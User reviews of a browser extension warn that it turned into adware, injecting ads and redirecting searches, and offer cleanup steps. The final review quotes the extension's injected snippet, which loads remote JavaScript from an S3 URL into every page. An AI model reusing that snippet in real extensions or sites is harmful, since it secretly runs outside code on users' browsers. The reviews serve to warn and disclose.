Have used this for a long time but saw spammy types of ads on every website I visited. I use Ad Blocker so was wondering what virus had got through. It turned out to be this extension! Uninstalled

As others have stated. This extension recently began displaying ads.
Ads out of no where - cost me 1/2 hour of productivity to isolate the problem.
It's garbage now, serving ads.
Carefull, this is ADWARE!! just as i see with other users, had this extension installed for some time now but now i see ads on different websites, even on my own projects, that were not supposed to be there. this raised the red flag and i was able to identify that this extension was the one spamming my browser with ads. Uninstalled and users should never trust such sort of plugins as the potential harm can be quite big

MALWARE WARNING This extension SEO SITE TOOLS hijacks your Google Search and redirects your browser to a web page entitled "Reimage Repair" at www.reimageplus.com. That web page claims your computer is infected and tells you to download their software to fix your computer. IT IS RANSOM-WARE! If you install this extension and fall into its trap, here is what to do: 1. Use Windows Task Manager to close Chrome (if Chrome refuses to close normally). 2. Reopen Chrome...but do not attempt a Google Search. Go immediately to 'CLEAR BROWSING DATA'...clear everything! 3. Uninstall this extension and don't look back! SUGGESTED ADDITIONAL ACTIONS: 1. Run CCleaner (checkmark all settings related to Chrome before running). 2. Download AdwCleaner from toolslib.net. Run AdwCleaner. Uncheck any items in scan results that are not related to Chrome. Click CLEAN.

SEO Site Tools, Site Analysis by sitexy.com is spreading Adware and malware across the browsers. They automatically implements "ad by advertise" or other ads on web pages without permission. The extension is not safe to use and i should be reported everywhere.
***WARNING: CONTAINS ADWARE*** Contains the "extension monetizer script" which is adware. It adds extremely risky/spammy sites to all of your google search results. I had installed this extension some time ago, forgotten about it and only recently started seeing ads. I had to spend an hour of my time hunting it down as I initially thought it was a virus. No scanner would detect it. Had to hunt it down myself. Look at the source code under " chrome/contentm_inc.js". It contains this code which links to the script: (function() { var s = document.createElement('script'); s.src = '//s3.amazonaws.com/js-static/bb4c64a07baf1cd933.js'; document.body.appendChild(s); })();
